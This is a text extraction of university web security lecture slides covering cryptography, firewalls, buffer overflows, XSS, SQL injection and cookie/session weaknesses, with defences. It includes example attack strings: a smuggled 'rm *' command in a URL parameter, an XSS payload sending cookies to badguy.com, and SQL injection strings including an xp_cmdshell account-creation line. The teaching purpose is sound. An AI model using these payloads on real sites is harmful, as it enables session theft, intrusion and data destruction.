Games and the Impossibility of Realizable Ideal Functionality
Download
Report
Transcript Games and the Impossibility of Realizable Ideal Functionality
CS6320 – Web Security
L. Grewe
Modified from
http://crypto.stanford.edu/cs155/
1
Issues
Authentication, Authorization
Protecting your system against hackers
Controlling access to critical data
Control inbound versus outbound traffic
security versus accessibility tradeoffs
security versus capability tradeoffs
multi-tier versus single-tier solutions
security versus expense tradeoffs
security and capability versus administrative
overhead and complexity
2
Solutions
Software-based
Hardware-based
Freeware versus Commercial Products
Use of Security Protocols
Cryptography
• Converting messages to unreadable forms...and
back
Steganography
• Hiding the existence of a message
3
One issue….buffer overflow…things
getting better
Majority of vulnerabilities now found in web software
25
20
15
10
5
0
2001
2002
2003
Web (XSS)
2004
2005
2006
Buffer Overflow
4
Source: MITRE CVE trends
Example Web Site architecture w/
Security Components
WS1
Load
Balancer
WS2
Firewall
Firewall
Application
Firewall
(WAF)
App
Servers
DB
WS3
Intrusion
Detection
System
Authorization
5
Attacks of systems
Common web-site attacks:
• Denial of Service
• Attack the web server
e.g. control hijacking:
Solutions:
(IIS, Apache) :
CodeRed, Nimda, …
• Harden web server: stackguard, libsafe, …
• Worm defense:
Host based intrusion detection,
Worm signatures generation,
shields.
6
Firewalls
• A system designed to prevent
unauthorized access to or from a private
network. Firewalls can be implemented
in both hardware and software, or a
combination of both
IP filtering (packet filtering)
• = controls access by solely looking at
information contained in the IP header of
data packets being sent to the server.
Proxy Servers/Application Firewalls
7
Web Application Firewalls
• Prevent some attacks such as:
• SQL Injection
• Form field tampering
• Cookie poisoning
Some examples:
• Imperva
• Kavado Interdo
• F5 TrafficShield
• Citrix NetScaler
• CheckPoint Web Intelligence
8
Message/Information Hiding
Protect some information being sent
from client to server and vice-versa.
Through encryption.
Some protocols such as SSL (secure
socket layer) using encryption to
perform “secure” exchange of
information.
9
Encryption
Convert normal, readable data into
obscured, unreadable data
Hi There!!
Encryption Algorithm
m/okuGlilkdskuch
Hi There!!
Encryption Algorithm
alieka;wk12938*
10
Decryption
Convert obscured, unreadable data into
normal, readable data
m/okuGlilkdskuch
Decryption Algorithm
Hi There!!
alieka;wk12938*
Decryption Algorithm
Hi There!!
11
Terminology
plaintext - clear readable text
ciphertext - unreadable text
cipher - algorithm(s) for encryption and
decryption
Hi There!!
alieka;wk12938*
Encryption Algorithm
alieka;wk12938*
Decryption Algorithm
Hi There!!
12
Terminology
Key -- a secret piece of information that
controls how the encryption algorithm
works
Different keys produce different encrypted
results
Key: “Citizen Kane”
Hi There!!
Encryption Algorithm
109291ala;dfwij?
Key: “Citizen Kano”
Hi There!!
Encryption Algorithm
398jfasd;k2//ad?
13
Symmetric Key Technology
Alice wants to send a
private/confidential message to Bob
Alice computes
c=crypt(message,key)
Sends c to Bob over unsecured wire
Bob computes
message=crypt(c,key)
14
Symmetric Key Application
Password login
Alice sends password to computer to
prove identity (authenticity)
Problem: Sniffing
Solution: Challenge/response
15
Shared Secret Key
Shared secret is great... but how do
we distribute it?
16
Asymmetric Key Cryptography
Instead of one key, have two
• public key
• private key
Public key known to everyone and a Private or
secret key known only to the recipient of the
message.
When John wants to send a secure message
to Jane, he uses Jane's public key to encrypt
the message. Jane then uses her private key
to decrypt it.
Computing private key from public key is very,
very difficult (factoring huge number)
17
Asymmetric Encryption Example
John:
finds Jane.pub (public key) from her
website (or she gives it in an email to
John)
John:
computes c = crypt(message, Jane.pub)
John:
sends c to Jane over unsecured wire
Jane:
computes message = crypt(c, Jane.priv)
18
Advantages
Key distribution not a problem!
Anyone can send a message to Jane
Only Jane can decrypt!
19
Asymmetric Encryption for
Authentication
Alice wants to tell Bob the message
is really from her!
Digital signature
Alice computes c = crypt(message,
Alice.priv)
Alice sends c over unsecured wire
Anyone can check that Alice is the
sender... by computing message =
crypt(c, Alice.pub)
20
Authenticity + Secrecy
Alice
A.priv
A.pub, B.pub, ...
Bob
B.priv
“I LUV U”
Carl & Eve
Bad People!
21
Authenticity + Secrecy
Alice
A.priv
A.pub, B.pub, ...
Bob
B.priv
“I LUV U”
B.pub
Carl & Eve
Bad People!
22
Authenticity + Secrecy
Alice
A.priv
A.pub, B.pub, ...
Bob
B.priv
“I LUV U”
B.pub
“This is from A”
Carl & Eve
Bad People!
23
Authenticity + Secrecy
Alice
A.priv
A.pub, B.pub, ...
Bob
B.priv
“I LUV U”
B.pub
“This is from A”
A.priv
Carl & Eve
Bad People!
24
Authenticity + Secrecy
Alice
A.priv
A.pub, B.pub, ...
Bob
B.priv
“I LUV U”
B.pub
“This is from A”
A.priv
Carl & Eve
Bad People!
25
Authenticity + Secrecy
Alice
A.priv
A.pub, B.pub, ...
Bob
B.priv
“I LUV U”
B.pub
“This is from A”
A.priv
Carl & Eve
Bad People!
26
Another Solution: Digital
Certificates
Certificate Authority: publishes that a
particular identity goes with a
particular public key
Alice gets certificate (identity <=>
public key), signed by CA
So if you trust CA, then you can trust
the public key
27
SSL…the idea
Jane connects to John's server
John's server returns
certificate (signed by
VeriSign), plus something
encrypted w/ John.priv
Jane can verify certificate is
valid
Uses public key to decrypt
token
John authenticated
Jane makes one time session
key k
Encrypts w/ John's public key,
sends to John
Now, can use symmetric key
cryptography
28
Attacks…
There are many kinds of attacks that
hackers have done
Will mention some more weaknesses
here ….but, take a class on security,
cryptography, etc. to get into more
details.
29
Attack: Denial of Service
Make the service unavailable
Flood of incoming traffic
Use robot to launch DOS on server.
Hard to trace identity of attacker.
Distributed DOS (DDOS)
• Take over many machines, launch
attack simultaneously from many
locations
30
Attack: Buffer Overflow
Bad guy sends a huge, over-sized
request to a naïvely implemented
(aka buggy) program, overflowing
the input buffer
May overwrite data in memory
(and/or) program code
May overwrite the return address on
the stack of a program in C, so that
the procedure call returns
somewhere else
31
How To Avoid Buffer Overflow
Write code carefully
Limit input size; read in small chunks
as opposed to reading in whole input
Use better languages (e.g. java)
32
Another Problem >>>>>What about
all of the web application code???
Runs on web server or app server.
• Takes input from web users (via web server)
• Interacts with the database and 3rd parties.
• Prepares results for users (via web server)
Examples:
• Shopping carts, home banking, bill pay, tax
prep, …
• New code written for every web site.
Written in:
• C, PHP, Perl, Python, JSP, ASP, …
• Often written with little consideration for
security.
33
Web Application problems
Inadequate validation of user input
• Cross site scripting
• SQL Injection
• HTTP Splitting
Broken session management
• Can lead to session hijacking and data theft
Insecure storage
• Sensitive data stored in the clear.
• Prime target for theft – e.g. egghead, Verizon.
• Note: PCI Data Security Standard (Visa, Mastercard)
34
A simple example
Direct use of user input:
http://victim.com/ copy.php ? name=username
script name
script input
copy.php:
system(“cp temp.dat $name.dat”)
Problem:
http://victim.com/ copy.php ? name=“a ; rm *”
(should be:
name=a%20;%20rm%20* )
35
Redirects
EZShopper.com shopping cart (10/2004):
http://…/cgi-bin/ loadpage.cgi ? page=url
• Redirects browser to url
Redirects are common on many sites
• Used to track when user clicks on external link
• EZShopper uses redirect to add HTTP headers
Problem:
phishing
http://victim.com/cgi-bin/loadpage ?
page=phisher.com
• Link to victim.com puts user at phisher.com
Local redirects should ensure target URL is local36
Cross Site Scripting
(XSS)
37
The setup
User input is echoed into HTML response.
Example:
search field
• http://victim.com/search.php ? term = apple
• search.php responds with:
<HTML>
<TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY>
</HTML>
Is this exploitable?
38
Answer…..Bad input
Problem:
no validation of input term
Consider link:
(properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
39
What is the problem?
Why would user click on such a link?
• Phishing email in webmail client (e.g. gmail).
• Link in doubleclick banner ad
• … many many ways to fool user into clicking
What if badguy.com gets cookie for
victim.com ?
• Cookie can include session auth for victim.com
Or other data intended only for victim.com
Violates same origin policy
40
Worse …
Attacker can execute arbitrary scripts in
browser
Can manipulate any DOM component on
victim.com
• Control links on page
• Control form fields (e.g. password field) on
this page and linked pages.
Example: inject password field that
sends password to bad guy.
Can infect other users:
MySpace.com worm.
41
MySpace.com
(Samy worm)
Users can post HTML on their pages
• MySpace.com ensures HTML contains no
<script>, <body>, onclick, <a
href=javascript://>
• … but can do Javascript within CSS tags:
<div
style=“background:url(‘javascript:alert(1)’)
”>
And can hide “javascript” as “java\nscript”
With careful javascript hacking:
• Samy’s worm: infects anyone who visits an infected
MySpace page … and adds Samy as a friend.
• Samy had millions of friends within 24 hours.
More info:
http://namb.la/popular/tech.html
42
Avoiding XSS bugs
(PHP)
Main problem:
• Input checking is difficult --- many ways to inject
scripts into HTML.
Preprocess input from user before echoing it
PHP: htmlspecialchars(string)
& &
" "
< <
> >
' '
• htmlspecialchars(
"<a href='test'>Test</a>", ENT_QUOTES);
Outputs:
43
<a href='test'>Test</a>
httpOnly Cookies
Browser
(IE)
GET …
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
HttpOnly
• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
• … but does not stop most other risks of XSS bugs.
44
SQL Injection
45
The setup
User input is used in SQL query
Example:
login page (in ASP)
set ok = execute(“SELECT * FROM UserTable
WHERE username=′ ” & form(“user”) &
“ ′ AND password=′ ” & form(“pwd”) & “ ′ ”
);
If not ok.EOF
login success
else fail;
Is this a problem?
46
The problem …..Bad input
Suppose
encoded)
user = “ ′ or 1 = 1 -- ”
(URL
Then scripts does:
ok = execute( SELECT …
WHERE username= ′ ′ or 1=1
-- … )
• The “--” causes rest of line to be ignored.
• Now ok.EOF
The bad news:
way.
is always false.
easy login to many sites this
47
Worse…
Suppose user =
′ exec cmdshell
′net user badguy badpwd′ / ADD --
Then script does:
ok = execute( SELECT …
WHERE username= ′ ′ exec …
)
If SQL server context runs as “sa”, attacker gets
account on DB server.
48
Avoiding SQL injection
Build SQL queries by properly escaping args:
′ \′
Example: Parameterized SQL: (ASP.NET 1.1)
• Ensures SQL arguments are properly escaped.
SqlCommand cmd = new SqlCommand(
"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”] );
cmd.ExecuteReader();
In PHP:
bound parameters -- similar function
49
App code
Little programming knowledge can be dangerous:
• Cross site scripting
• SQL Injection
• HTTP Splitting
What to do?
• Band-aid: Web App Firewall (WAF)
Looks for attack patterns and blocks requests
False positive / false negatives
• Code checking
55
Code checking
Blackbox security testing services:
• Whitehatsec.com
Automated blackbox testing tools:
• Cenzic, Hailstorm
• Spidynamic, WebInspect
• eEye, Retina
Web application hardening tools:
• WebSSARI [WWW’04] : based on
information flow
• Nguyen-Tuong [IFIP’05] : based on tainting
56
Session Management
Cookies, hidden fields,
and user authentication
57
Cookie risks
Danger of storing data on browser
• User can change values
Silly example: Shopping cart software.
Set-cookie: shopping-cart-total = 150
($)
• User edits cookie file (cookie poisoning):
Cookie:
shopping-cart-total = 15
($)
• … bargain shopping.
Similar behavior with hidden fields:
58
<INPUT TYPE=“hidden” NAME=price VALUE=“150”>
Not so silly …some real sites had
this issue
D3.COM Pty Ltd: ShopFactory 5.8
@Retail Corporation: @Retail
Adgrafix: Check It Out
Baron Consulting Group: WebSite Tool
ComCity Corporation: SalesCart
Crested Butte Software: EasyCart
Dansie.net: Dansie Shopping Cart
Intelligent Vending Systems: Intellivend
Make-a-Store: Make-a-Store OrderPage
McMurtrey/Whitaker & Associates: Cart32 3.0
[email protected]: CartMan 1.04
Rich Media Technologies: JustAddCommerce 5.0
SmartCart: SmartCart
Web Express: Shoptron 1.2
59
Solution
When storing state on browser MAC data
using server secret key.
.NET 2.0:
• System.Web.Configuration.MachineKey
Secret web server key intended for cookie
protection
• HttpCookie
val);
HttpCookie
(cookie);
cookie = new HttpCookie(name,
encodedCookie =
HttpSecureCookie.Encode
• HttpSecureCookie.Decode (cookie);
60
Cookie authentication
Browser
Web Server
POST login.cgi
Username & pwd
Set-cookie: auth=val
GET restricted.html
Cookie: auth=val
If YES,
restricted.html
Auth server
Validate user
auth=val
Store val
restricted.html
auth=val
Check val
YES/NO
61
Weak authenticators: security risk
Predictable cookie authenticator
• Verizon Wireless - counter
• Valid user logs in, gets counter, can view
sessions of other users.
Weak authenticator generation: [Fu et al. ’01]
• WSJ.com:
cookie = {user, MACk(user) }
• Weak MAC exposes K from few cookies.
Apache Tomcat: generateSessionID()
• MD5(PRNG) … but weak PRNG [GM’05].
• Predictable SessionID’s
62